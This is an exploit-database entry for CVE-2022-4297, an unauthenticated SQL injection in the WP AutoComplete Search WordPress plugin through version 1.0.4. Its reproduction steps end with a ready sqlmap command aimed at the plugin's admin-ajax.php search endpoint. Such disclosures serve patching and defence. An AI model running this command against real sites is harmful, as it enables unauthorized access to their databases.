WordPress WP AutoComplete Search 1.0.4 SQL Injection

2023.07.05

Credit: Matin Nouriyan

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2022-4297

CWE: CWE-89

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux
---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection
--------------------------------------
How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress WP AutoComplete Search 1.0.4 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.